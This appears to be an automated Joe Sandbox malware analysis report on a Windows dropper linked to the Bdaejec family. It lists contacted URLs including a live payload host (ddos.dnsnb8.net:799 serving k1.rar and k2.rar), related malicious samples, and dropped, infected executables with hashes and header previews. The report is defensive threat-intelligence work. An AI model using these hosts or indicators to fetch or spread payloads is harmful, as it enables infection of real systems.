http://www.activestate.com	SciTE.exe.2.dr	false		high
http://ddos.dnsnb8.net:799/cj//k1.raru	JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false		high
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	JdEV.exe, 00000002.00000002.2597280384.0000000000D13000.00000002.00000001.01000000.00000004.sdmp, JdEV.exe, 00000002.00000003.2071431419.00000000011E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.spaceblue.com	SciTE.exe.2.dr	false		high
http://upx.sf.net	Amcache.hve.2.dr	false		high
http://www.baanboard.com	SciTE.exe.2.dr	false		high
http://www.rftp.com	SciTE.exe.2.dr	false		high
http://ddos.dnsnb8.net:799/cj//k2.rarGp	JdEV.exe, 00000002.00000002.2598094406.0000000002B7A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false		high
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false		high
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false		high
http://www.scintilla.org	SciTE.exe.2.dr	false		high
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585133
Start date and time:	2025-01-07 06:07:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BXOZIGZEUa.exe renamed because original name is a hash value
Original Sample Name:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
Detection:	MAL
Classification:	mal66.spre.troj.evad.winEXE@7/16@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 34 Number of non-executed functions: 348
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.64, 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	bumxkqgxu.biz/vnlfrtbjm
	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/edmrjb
	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/eglmpsrvxnyx

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105
	ib.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3D	Get hash	malicious	Unknown	Browse	3.233.158.25
	https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253	Get hash	malicious	KnowBe4	Browse	52.55.210.33
	x86_64.elf	Get hash	malicious	Mirai	Browse	54.86.71.160
	arm5.elf	Get hash	malicious	Mirai	Browse	107.22.157.131
	spc.elf	Get hash	malicious	Mirai	Browse	54.136.161.121
	sh4.elf	Get hash	malicious	Mirai	Browse	107.23.89.175
	m68k.elf	Get hash	malicious	Mirai	Browse	34.236.109.145
	arm4.elf	Get hash	malicious	Mirai	Browse	52.90.71.108
	mpsl.elf	Get hash	malicious	Mirai	Browse	44.200.217.194

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\JdEV.exe	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse
	ib.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.59136493937655
Encrypted:	false
SSDEEP:	384:1FmUScXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:et8QGPL4vzZq2o9W7GsxBbPr
MD5:	138DE96CAE0ECE4D36CCCCFF751E1477
SHA1:	8CE79EF5C3FBE2932BA5CEE7202BAF19133F14D1
SHA-256:	52DA201660D7B4402F0DFD5EC54EAF625DFCEB30E631E46EB5A3988C67552A97
SHA-512:	E0AC3E19202A9D7BDF46F27ADE5CB096FA94080CC0954D283C23E5EE815E5AF9B1DA9C6EE19CCBA15B86B4726A984BFA815081CAE3547C6CAB02B464FC85C3B6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731345473641953
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	2F365839E9C8B28750D07CCB95B8F008
SHA1:	B1454610D0F57E6000B3D7DA61A2224EFBB9E85C
SHA-256:	1B7D0B3B2E03FC422B07F1A86811F9A081668CACB0EB7915F1FC889A7E623E7D
SHA-512:	568D1D520C99628FB7BD7E0E049CD15884FC8BAB1E8F52DA37E6BBD19CC46C61AAED5C22182177B6251C983E542100A5B10A51AE5E20A022B49C550F415CE2C5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.365985714863891
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdtBQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdtmGCq2iW7z
MD5:	CF99C490ECEBC6F3099ED146E75BAD7B
SHA1:	4C00D073CEA301532F5A16660FB623F707EF348A
SHA-256:	A39E02A55C414CA2A62C79BA1C98C6D6DC4565829F814EE539F2245FBBCD389F
SHA-512:	7D30B77876722CFBEB08D36E6DA98258C881C255BB043B38135F6923320702E477903FF0CD266762F105D546D2A12A4098957572ABBBAD4B2B4E858945662329
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JdEV.exe_cd8f4618334c72b9a4dd6cfe872fc24dcdd0ad_684e5ed5_2c465ccf-9f0d-4490-93df-6e7ad4546399\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9841334238155683
Encrypted:	false
SSDEEP:	192:rKvwxvN6UI0fyRmgSv3j0/J9zuiFckZ24IO8eOB6:riwxvN6Ujf8mRv3jAzuiFckY4IO8eOB
MD5:	4368566DFAE0E3B90D5545AC2D87F299
SHA1:	270E2D6B16E443A25D4D8E911DC1F4F035CBC4DF
SHA-256:	03008AA5CFEFD619F1902A0078D6C747FE5376F4162C808AC66D12D844BC3819
SHA-512:	1946044DA8849E45CAC95D12040A21CAAF929A1AC366E89C4A489296CD261073FBD34E460D405DD112D7469453677118E03640ACB1F24BC7812480E8F5AA6BF1
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.7.0.0.0.8.3.4.7.4.4.5.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.7.0.0.0.8.4.0.9.9.4.5.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.4.6.5.c.c.f.-.9.f.0.d.-.4.4.9.0.-.9.3.d.f.-.6.e.7.a.d.4.5.4.6.3.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.8.7.e.7.5.8.-.3.5.d.d.-.4.5.1.3.-.a.7.e.d.-.8.9.f.0.c.2.9.c.7.5.8.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.d.E.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.c.4.-.0.0.0.1.-.0.0.1.4.-.0.f.f.a.-.3.6.1.d.c.2.6.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.4.d.b.6.7.8.b.c.8.d.1.6.8.1.4.c.0.e.8.0.0.3.e.d.4.1.4.d.c.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.J.d.E.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39D4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jan 7 05:08:03 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	160940
Entropy (8bit):	1.8609507336429265
Encrypted:	false
SSDEEP:	384:QH+EYiFNdD7gx9HAb7GUqpDGKiVuGppZLuNeBGzkzWoprbIn:QH+EP6x9HAXGjDG+ALuFoc
MD5:	A0A146F2A4FDBA14C0C193918E076757
SHA1:	474C9CE26319DEA66859F2A629D427DE51CD7F9D
SHA-256:	088B495515746B166078A3C8CB5E43E94C82BEC8E4F260F1B1FD1DA623EFA869
SHA-512:	741306A252611B6969F0C8571787D23AA12D1A5BF1E3DA5EF25F3C99AE8371746973C67DC2897C6B91062187217617590F20BC2A95C3DE77CD0B372A8357E225
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........\|g............t.......................<...,!......D....Q..........`.......8...........T...........@>..l6..........h!..........T#..............................................................................eJ.......#......GenuineIntel............T.............\|g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3ADE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6256
Entropy (8bit):	3.719234995987262
Encrypted:	false
SSDEEP:	192:R6l7wVeJRCv6+BqeYwwWuqdpDH89bH8sfONm:R6lXJRK6+VYwwWaHPfV
MD5:	425D1D7CDF809E2FE7CCBFA91D487754
SHA1:	784C943F63798BCEE7C6463B1C2DD1C3855B7B37
SHA-256:	E7C3480CEF95833F08FAF41E115FB67A5D1AFAE9B4F4166F404D25390E120AC7
SHA-512:	4A178DE691E52C9AA4452CFF3844BC893CBAF5F077D9F53D3B3382E48917ACFB26D1C83DAD0CAB327F71078C7E3A5F86A0D35564EFD160236BC365458C1F1FC7
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B2D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.436549818226328
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPeJg77aI97QWpW8VYcYm8M4JwGFc+q8m5U0zgqAd:uIjfPUI7pp7VUJGxU0zgqAd
MD5:	F806D7108BB33726E6B799A47809C6CE
SHA1:	31BF1FB7156F65BE74AB4BBC7AC6268776AC42BC
SHA-256:	E9C3580394B73B4F7F36EF6C4486CC42C7B1A32CBD6E2498625B0090C91B9F1D
SHA-512:	F22C8BE96AD1D7C6DD828A2A676C6E83F6970C6B12211B43207A4B8A047E562E13BB895BCC73F83104567B859AAEC0772F513F064C608075CC3D28089FD42333
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665050" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\14EA1872.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\69197FDE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\JdEV.exe

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: ArjM1qx3hV.exe, Detection: malicious, Browse Filename: aRxo3E278B.exe, Detection: malicious, Browse Filename: yRc7UfFif9.exe, Detection: malicious, Browse Filename: gT6IitwToH.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse Filename: ib.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\INF\oem0.PNF

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1158 "Signature", at 0x68 WinDirPath, LanguageID 809
Category:	dropped
Size (bytes):	5884
Entropy (8bit):	3.2100538689449323
Encrypted:	false
SSDEEP:	96:16T0jnDWLlB9Su3H75DjLocg8IwJR56mXkR/1fszenFWhH:sCyZSuXVDjLor8IwJRMm0wzOEp
MD5:	5F167C05E471EB855F876E5F670AA73C
SHA1:	88BE1D17384EE549AAE791F326C35F60D194C1A6
SHA-256:	4FAF06C683C2F6680B0B3F73C6A99E3FD84014CC2BD3DB6863F56F288F3FD13F
SHA-512:	CF8CCDCCBF16BF10B91B0DE0076369CA3985EDB1976616F57C82783685AC890C8FA5A388AC2066163B6B9119BA9C0DE4FE6ED39161DF0B3DF06C2555AC9F8076
Malicious:	false
Preview:	................H...X....d..................................h...,.......0.......h.......................C.:.\.W.i.n.d.o.w.s.........................................................................................................\...................................................................\|.......................\|...........................................................................................................................................................................`.......H.......................................................................L...................................................................................................................@...........................................................................................................................................................h.......................t...................................................................................................................................

C:\Windows\INF\oem1.PNF

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1100 "Signature", at 0x68 WinDirPath, LanguageID 809
Category:	dropped
Size (bytes):	5740
Entropy (8bit):	3.173847699149194
Encrypted:	false
SSDEEP:	96:EHv3dP0/4NiuIR0ONNjnuUw8u5pF6KXkRQ1fsCncekSDzD:E1viuCVDjuT8u5p4K05CcWDzD
MD5:	3821A155A04A6A2E4811B60BEE95BA38
SHA1:	76E66DB688BD24BC907D7EF90A951D4CD74FB710
SHA-256:	6931E4EA0B4B6C80DA549F8EAA738639FBC03590B0429C773C5E6D75085E80D4
SHA-512:	DF33A4829683F534C505FADC7BE5BB2899614A42FE85446ABA8593D4C13D065C25871557563F9F3D7F1BAEA4927788B184573B9A8CC4C248BA873AEB8D0E1B18
Malicious:	false
Preview:	................H..................................H...............(.......H...h...............h.......C.:.\.W.i.n.d.o.w.s.....x...................................................$...............................................................................................................d...(...........................................................................................................................................................................................................................................................x...................................................................$...............................................................................................4...........................0.......................................................................................................................................................................................................p...........................................................

C:\Windows\INF\oem3.PNF

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1210 "Signature", at 0x68 WinDirPath, LanguageID 809
Category:	dropped
Size (bytes):	6284
Entropy (8bit):	3.210060094944142
Encrypted:	false
